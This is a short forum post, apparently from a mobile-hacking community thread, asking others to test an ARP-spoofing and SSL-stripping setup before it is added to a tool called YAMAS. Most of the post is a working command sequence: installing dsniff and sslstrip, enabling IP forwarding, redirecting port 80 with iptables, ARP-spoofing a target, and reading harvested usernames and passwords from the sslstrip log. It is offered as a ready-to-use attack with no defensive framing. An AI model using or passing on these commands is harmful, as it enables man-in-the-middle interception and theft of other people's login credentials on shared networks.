View Single Post
Posts: 856 | Thanked: 1,681 times | Joined on Apr 2010 @ Aleppo ,Syria
#174
i would like to ask you guys to test the new arpspoof
with sslstrip before comax adapte it to YAMAS

Code:
sudo gainroot
Code:
apt-get install dsniff sslstrip iptables
#press y
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port #pickupanemptyport
arpspoof -i wlan0 -t #target #routerip
sslstrip -l #thesamepickedupnumber
then try to access ex:hotmail from PC
then CTRL+C
then see the sslstrip.log
you should see the pass and the username
 

The Following 2 Users Say Thank You to karam For This Useful Post: